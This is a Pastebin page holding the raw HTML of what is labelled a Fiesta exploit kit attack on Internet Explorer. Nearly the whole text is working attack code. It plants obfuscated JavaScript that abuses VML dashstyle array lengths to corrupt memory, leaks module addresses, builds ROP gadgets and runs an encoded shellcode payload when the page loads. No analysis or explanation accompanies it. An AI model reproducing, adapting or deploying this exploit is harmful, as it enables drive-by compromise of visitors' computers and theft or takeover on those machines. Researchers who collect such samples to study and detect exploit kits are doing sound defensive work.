API tools faq
paste
Advertisement
ydklijnsma

Fiesta Exploit Kit MSIE Exploit

ydklijnsma
Sep 26th, 2013
6,431
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 8.07 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <style>
  3.     v\:* {
  4.         behavior:url(#default#VML);
  5.         display:inline-block
  6.     }
  7. </style>
  8. <xml:namespace
  9. ns='urn:schemas-microsoft-com:vml'
  10. prefix='v'
  11. />
  12. <script>
  13.     function Exploit() {
  14.         var payload = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIV8JKr82zlIZvNiKgK0wNJIT4TKLyOqvcwpWpLlvTJXNJyrkJKOKbjcYxYskOyoKO7a9cKKXxL8oVnM2QwmLPOgofjXL8LPLMlJJ4nuLlNpqfNV9f24lPzOp2KcOf4PnLyjZXxxoQMqLPMM4WlwymlhTP3XkJL8kHnHMBYnObzXNpyskNtpJUlPwnkrnoN6FpjkKJl8Yh9YEsPOYxMBmhNKlkNrjXLPnL5brwayLP8oebXSZ6tPM2YjhxIhrOLPlYSI7Qdwnp8o028SlVVpl2xzL8L8O4YnK4YxnKnOdPQUihJXzXRXFdn8NekLObl9uC8zlRihNNnOFp3MKHjXZXNNPuNlMoinTPnwl8KHJX3MwHlMNNMBXsOQnQNlMxOYQknewp9ilLM2LnVprKyiL8kHsMFXLMkRO9txmL0sx8kP0sx8jlku7lKJhxl8lMVCNNDP7Zl8HxZXSMfXLLgYoQOVhIp8ONYPONvglMFbo0ynLMCdLoMoMoMNKqyolMeQ5oKOzckHzijX3ElOkNlgr0xmxxIhzX4q7KmBXxZ2TFlP3PZ7mgXEnpTJusNlRutPNlkIJXxxzi6QMyoYnKNNnOMyUWNMWtWKLmPqgmNrzXlPyML8LkzXPqFx6gnmZTMxgwlMjPnpOvx2QkFOnpTJ5sNlv5VpoNKIKHYhDqdzzPzXNMd15MlnNO76LOTSickiLhnLLRZPnr5WNpjWQOZFLanNr0YOjYKHHxMrrI7k8Dt3mUhpmxNLWwNmkDlolRIqMzNpI2MFGSq3lnTPZTIiXxL8e9mpEKJyVgXONpueqdNos9lnDPvcyhxxKHkG2n8pnQLiWwZoJ09ZOvyn8XNNfp6qxxZXxxQcHpU9Lgmvp1vZxpxxnNnOnMPq7mpsLMYxLnONOnqk9VyhlMwqt5NfIkvpJIZXJX8xN7MKjxNkNlj9MZnlKhJzXZjxkjIMNkiJXxlo4PlqtGuW6gRULLoOIjnOLnNpK6LrQkToLPdJq3lLru20E4jXjXL8nrxDMqJq7DbUlEGLOYLoo94xTKSbi72WkONrnklPlVl8MIhxnpnjkHNmL8BQooL4LPkITMjMNzLPKNfzV5HJdPLUihZXkHQaOOl0tPJHhxJXHxOkihz5kHMLHxHVyhOmXxMPZXMMl8KHxxpwMojHBQNoxlLoJ0euUpKfwtLPURK2rMWlfp8GxxJX8xfQNGNFvZKLyhNM2QUMnrllOQJqDtnOSEk5PTNOO9p84KCbi7rUOGkXMBMld7JYnOliMxNHMxLhOXY8Y8DGnmhpNpppEVpKhnj08oTrkcLVVpKMYhHxl8mwfQwJKLjXMqTPJQxx9hXxOXDPJejXIhKHmys7WhlXzi5hmLd3oXKxPsMzZTD3LjZLPsLJjpZiUWYYTxRtONsMP8lL9eJdLYOtKJxTJxGIvWIel9Eo4Sb3HCk4iLYLrSnZyxbSizNmWSaaOLKlzDNytzKLJXNxPslTyL9LpsOMO41cNLKMMPyivrSCLrkPrSnBKhJYvsuKzlh1CC8LbSL9TVIYeWky7H34QD3Lp8lLKOVYP79exyWOeCVlYSk4KljpnmWicCnBklXyfsonrSXtmcpsmrKTyi23qcilsCl94Pt1mlKlkTMI4zhp8xb0wxVd5Ws7NplLLLNhKrJw8WMLmMNqmLonLWz7z4ogLOLQz6MOz0Z7J7OoN6LMnkHWmRMPlRXKlQoqOlXWo7JmJnmJMJzoKpMNOlLZkqHJMMKqHOOnOiXMYXxLomkxzoJmIQO8ZmYXJkhMXJzmxLYXjkO8xLJmXM8MJaO8Zk8MlYzmXNxMOnxHkxKxjlXMXNZmkxZmhLjmMKZmMNXHZjXCKykszmihJXKHA";
  15.         var new_element = window.document.createElement('script');
  16.         new_element.text = "spa=[];wos=[];pec=[];sat=[];rif=null;gat=null;ged=null;him=null;gyp=null;zax=null;tie=null;tod=null;oxy=null;sol=null;nap=null;imp=null;kin=null;bun=null;pis=null;mid=null;aga=null;function ire(){var l,k,s,w,o;try{w=navigator.userAgent.toLowerCase();s=/MSIE[\/\s]\d+/i.test(w);l=/WOW64;/i.test(w);k=/Win64;/i.test(w);o=/Trident\/(\d)/i.test(w)?parseInt(RegExp.$1):null;if(!k&&s&&o&&(o==6||o==5||o==4)){gat=o;ged=l;return true}}catch(exc){}return false}function fey(y,m,c){var u;if(y.length<m.length){return-1}if(c){if(y.substr(y.charCodeAt(0)==0?1:0,m.length)==m){return 0}}else{u=y.length-m.length;if(y.charCodeAt(y.length-1)==0){u++}if(y.substr(u,m.length)==m){return u}}return-1}function oud(y){var g,q,n;n='';for(g=0;g<y.length;g++){q=y.charCodeAt(g);n+=String.fromCharCode(q&0xff);n+=String.fromCharCode((q&0xff00)>>8)}return n}function kas(c){var l,k;l='';if(c.length%2){c+=unescape('%00')}for(k=0;k<c.length;k+=2){l+='%u';l+=lei(c.charCodeAt(k+1),2);l+=lei(c.charCodeAt(k),2)}return l}function rho(k){return oud(unescape(ran(k)))}function ran(t){var c,j;j=t&0xFFFF;c=(t>>16)&0xFFFF;return '%u'+lei(j,4)+'%u'+lei(c,4)}function pur(z){him.dashstyle.array.item(0x44)=z;return wos[gyp].marginLeft}function lei(r,s){var a;a=r.toString(16);while(a.length<s){a='0'+a}return a}function aby(i){var s;s='';if(i.length>1){s=lei(i.charCodeAt(1),4)+lei(i.charCodeAt(0),4)}else{s=lei(i.charCodeAt(0),4)}return parseInt(s,16)}function wry(y){var z,u,v;for(z=0;z<3;z++){v=pur(y+z);if(v){u=aby(v);u<<=z*8;return u}}return 0}function eel(){var q,n,f,a;n=wry(0x7ffe0268)&0x0f;a=n?wry(0x7ffe0264):null;f=wry(0x7ffe026c);q=wry(0x7ffe0270);if(f==5&&(q==1||q==2)&&a==1){return 1}else if(f==6&&q==0&&a==1){return 2}else if(f==6&&q==1&&a==1){return 3}else{return 0}}function dog(){return ged?wry(0x7ffe0340):wry(0x7ffe0300)}function loo(k){var p,l,t,z;p=null;if(k){k&=0xffff0000;while(1){if((wry(k)&0xffff)==0x5a4d){p=k;break}k-=0x10000}if(p){t=p+wry(p+0x3c);if(wry(t)==0x4550){l=wry(t+0x1c);z=wry(t+0x2c);if(l&&z){return{a:p+z,b:p+z+l}}}}}return null}function avo(){var q,h,q,h,u;for(q=0;q<0x400;q++){spa[q]=document.createElement('v:shape');document.body.appendChild(spa[q])}him=document.getElementById('war');for(q=0;q<0x400;q++){wos[q]=spa[q]._vgRuntimeStyle}for(q=0;q<0x400;q++){wos[q].rotation;if(q==0x300){him.dashstyle='1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44'}}tie=him.dashstyle.array.length;try{him.dashstyle.array.length=0-1}catch(exc){return false}for(q=0;q<0x400;q++){wos[q].marginLeft='a';u=him.dashstyle.array.item(0x44);if(u>0){zax=u;gyp=q;return true}}return false}function per(){if(him){if(zax){him.dashstyle.array.item(0x44)=zax}him.dashstyle.array.length=tie}}function tug(){var q,m,c,d,k,p,o,f,n,t,y,i,w,u,a,b,j,v,z,x,h,r,g;g=eel();if(g==0){return}v=dog();if(!v){return}h=loo(v);if(!h){return}q=unescape('%94%c3');c=unescape('%5a%c3');z=unescape('%ff%06%c3');p=unescape('%ff%07%c3');u=unescape('%5e%c3');m=unescape('%5f%c3');f=null;n=null;if(ged){f=unescape('%b8%4d');n=unescape('%33%c9%8d%54%24%04%64%ff%15%c0')}else{if(g==1){f=unescape('%b8%89')}else if(g==2){f=unescape('%b8%d2')}else if(g==3){f=unescape('%b8%d7')}n=unescape('%ba%00%03%fe%7f%ff%12%c2%14')}a=null;r=null;d=null;j=null;x=null;t=h.a;y=h.b;while(t<y){w=pur(t);if(w){b=null;o=oud(w);if(!bun&&(x||(b=fey(o,f,false))!=-1)){if(!x){x=t+b}else if(fey(o,n,true)!=-1){bun=x}else{x=null}}if(!imp&&(b=o.indexOf(q))!=-1){imp=t+b}if(!kin&&(b=o.indexOf(c))!=-1){kin=t+b}i=(a&&d);k=(r&&j);if(!i){if(!a&&(b=o.indexOf(z))!=-1){a=t+b}if(!d&&(b=o.indexOf(u))!=-1){d=t+b}}if(!k){if(!r&&(b=o.indexOf(p))!=-1){r=t+b}if(!j&&(b=o.indexOf(m))!=-1){j=t+b}}if(imp&&kin&&bun&&(i||k)){break}t+=o.length}t+=2}if(i||k){if(i){pis=a;mid=d}else{pis=r;mid=j}}return(imp&&kin&&bun&&pis&&mid)}function van(){var a,s,h,y;tod=document.getElementById('elk');for(y=0;y<0x400;y++){pec[y]=spa[y]._anchorRect;if(y==0x300){tod.dashstyle='1 2 3 4'}}s=tod.dashstyle.array.length;try{tod.dashstyle.array.length=0-1}catch(exc){return null}h=tod.dashstyle.array.item(6);a=tod.dashstyle.array.item(7);if(h>0&&a>0&&tod.dashstyle.array.item(8)==1){oxy=h;sol=a;nap=s;return true}tod.dashstyle.array.length=length;return false}function dag(){if(tod&&sol&&nap){tod.dashstyle.array.item(7)=sol;tod.dashstyle.array.length=nap}}function nub(){var v,b,m,d,x,k,n;v=loo(oxy);if(!v){return false}x=unescape('%8b%01%ff%50%04');b=v.a;m=v.b;while(b<m){k=pur(b);if(k){d=null;n=oud(k);if((d=n.indexOf(x))!=-1){aga=b+d;return true}b+=n.length}b+=2}return false}function oxo(){var m;m='AB';while(m.length<0x40000){m+=m}return m.substring(0,0x3FFED)+'XXX'}function haj(){var d,u,q;u=gat==6?'%8d%76%04':'%90%90%90';q=gat==6?'%f8':'%fc';d=gat==6?'%f0':'%f4';return unescape('%eb%1f%60%8b%44%24%20%ff%d0%61%8b%75%08'+u+'%c7%06'+rho(sol)+'%8d%65'+q+'%8b%45'+d+'%83%e8%08%ff%e0%e8%dc%ff%ff%ff')}function bap(){var v,o,d,t,b,u,l,w;him.dashstyle.array.item(0x44)=zax;u=oxo();l=haj();o=kas(rif);for(t=0;t<7;t++){wos[gyp].marginLeft=u;d=zax=him.dashstyle.array.item(0x44);v=d+u.length*2;b=unescape(ran(v+4)+ran(v+0x0c)+ran(aga)+ran(kin)+ran(imp)+ran(mid)+ran(v+0x41)+ran(pis)+ran(mid)+ran(v+0x4e)+ran(pis)+ran(bun)+ran(v+0x54)+ran(0xffffffff)+ran(v+0x48)+ran(v+0x4c)+ran(0xffffff40)+ran(v+0x4F)+ran(v+0x54)+ran(0xffff0400)+ran(0x41414141)+kas(l)+o);wos[gyp].marginLeft+=b;w=him.dashstyle.array.item(0x44);if(d==w){return v}}return null}function mop(){var j,r;if(!ire()){return}if(!avo()){return}if(!tug()){return}if(!van()){return}if(!nub()){return}r=bap();if(!r){return}tod.dashstyle.array.item(7)=r;for(j=0;j<0x400;j++){sat[j]=document.createElement('div');sat[j].classname=pec[j]}return}function pol(f){rif=f;mop();per();dag();return};";
  17.        window.document.body.appendChild(new_element);
  18.        window.pol(payload)
  19.    }
  20. </script>
  21. <body
  22. onload='Exploit();'>
  23.     <v:oval>
  24.         <v:stroke
  25.        id='war'
  26.        /></v:oval>
  27.     <v:oval>
  28.         <v:stroke
  29.        id='elk'
  30.        /></v:oval>
  31.     </body>
  32.  
  33. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!